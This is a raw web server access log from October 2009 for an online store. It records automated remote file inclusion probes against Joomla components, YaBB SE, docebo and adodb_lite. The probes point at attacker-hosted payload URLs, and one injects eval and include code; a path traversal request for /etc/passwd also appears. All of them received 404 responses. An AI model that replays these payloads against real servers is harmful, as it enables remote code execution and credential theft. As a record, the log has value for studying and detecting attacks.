72.9.225.71 - - [12/Oct/2009:02:05:49 -0400] "GET /logs/access_log.Q109100200%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:05:55 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:05:55 -0400] "GET /logs/access_log.Q109061800//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:05:55 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:05:56 -0400] "GET /logs/access_log.Q109051600//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:05:57 -0400] "GET /logs/access_log.Q109061000//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:06:10 -0400] "GET /logs/access_log.Q109061000%20%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 303 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:02:06:20 -0400] "GET /logs/access_log.Q109081300%20%20//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:02:06:24 -0400] "GET /logs/access_log.Q109081300%20%20//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:02:06:26 -0400] "GET /logs/access_log.Q109070300%20%20//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:02:06:26 -0400] "GET /logs/access_log.Q109070300%20%20//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
119.63.193.55 - - [12/Oct/2009:02:06:33 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
61.129.64.174 - - [12/Oct/2009:02:06:47 -0400] "GET /logs/access_log.Q109081300%20%20//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
61.129.64.174 - - [12/Oct/2009:02:06:55 -0400] "GET /logs/access_log.Q109070300%20%20//index.php?option=com_content&task=ionid=&id=&mosConfig_absolute_path=http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:07:05 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:07:05 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:07:05 -0400] "GET /logs/access_log.Q109100200//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
201.76.47.207 - - [12/Oct/2009:02:07:13 -0400] "GET /logs/error_log.Q109060500/index.php?pag=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
201.76.47.207 - - [12/Oct/2009:02:07:14 -0400] "GET /index.php?pag=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
201.76.47.207 - - [12/Oct/2009:02:07:14 -0400] "GET /logs/index.php?pag=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.805"
72.9.225.71 - - [12/Oct/2009:02:07:24 -0400] "GET /logs/access_log.Q109061000//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:07:31 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:07:31 -0400] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:07:31 -0400] "GET /logs/access_log.Q109061000//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
67.228.191.194 - - [12/Oct/2009:02:07:41 -0400] "GET /logs/access_log.Q109091000/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://yaeil.ac.kr/dboard/files/id1?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
72.9.225.71 - - [12/Oct/2009:02:07:50 -0400] "GET /logs/access_log.Q109061800//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
67.228.191.194 - - [12/Oct/2009:02:08:00 -0400] "GET /logs/access_log.Q109081200/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://yaeil.ac.kr/dboard/files/id1?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:02:09:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
119.63.199.41 - - [12/Oct/2009:02:12:33 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.jp/spider/)"
211.111.160.5 - - [12/Oct/2009:02:12:35 -0400] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:02:12:35 -0400] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:02:12:37 -0400] "GET /logs/access_log.Q109050800%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:02:13:04 -0400] "GET /logs/access_log.Q109062200%20%20/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:02:13:33 -0400] "GET /logs/access_log.Q109062200/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.38.243.71 - - [12/Oct/2009:02:13:35 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
218.38.243.71 - - [12/Oct/2009:02:13:35 -0400] "GET /logs/access_log.Q109080700//yabbse/Sources/Packages.php?sourcedir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.243.71 - - [12/Oct/2009:02:13:35 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:02:13:35 -0400] "GET /logs/access_log.Q109050800/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
93.186.192.24 - - [12/Oct/2009:02:14:43 -0400] "GET /logs/access_log.Q109091000/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://yaeil.ac.kr/dboard/files/id1?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Oct/2009:02:14:53 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.111.160.5 - - [12/Oct/2009:02:14:55 -0400] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:02:14:55 -0400] "GET /logs/access_log.Q109092000/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:02:14:55 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
93.186.192.24 - - [12/Oct/2009:02:14:55 -0400] "GET /logs/access_log.Q109081200/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://yaeil.ac.kr/dboard/files/id1?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
211.111.160.5 - - [12/Oct/2009:02:15:08 -0400] "GET /logs/access_log.Q109080400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.38.243.71 - - [12/Oct/2009:02:16:22 -0400] "GET /logs/access_log.Q109080700//yabbse/Sources/Packages.php?sourcedir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
218.38.243.71 - - [12/Oct/2009:02:16:22 -0400] "GET //yabbse/Sources/Packages.php?sourcedir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
218.38.243.71 - - [12/Oct/2009:02:16:23 -0400] "GET /logs//yabbse/Sources/Packages.php?sourcedir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
217.70.32.2 - - [12/Oct/2009:02:17:19 -0400] "GET /rb? HTTP/1.1" 404 200 "-" "libwww-perl/5.803"
121.169.189.169 - - [12/Oct/2009:02:18:06 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76790 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:08 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:08 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:08 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:08 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:08 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:09 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:09 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:09 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:09 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:09 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:09 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:09 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:09 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:09 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:09 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:09 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:12 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:12 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:12 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:12 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:12 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:12 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:12 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:13 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:13 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:13 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:13 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:13 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:13 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:14 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:16 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG HTTP/1.1" 200 37504 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:17 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:17 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:17 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:17 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:17 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:18 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:18 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:18 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:18 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:18 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:18 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
121.169.189.169 - - [12/Oct/2009:02:18:18 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L317B24410B09E900FBF800H+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.25 Safari/532.0"
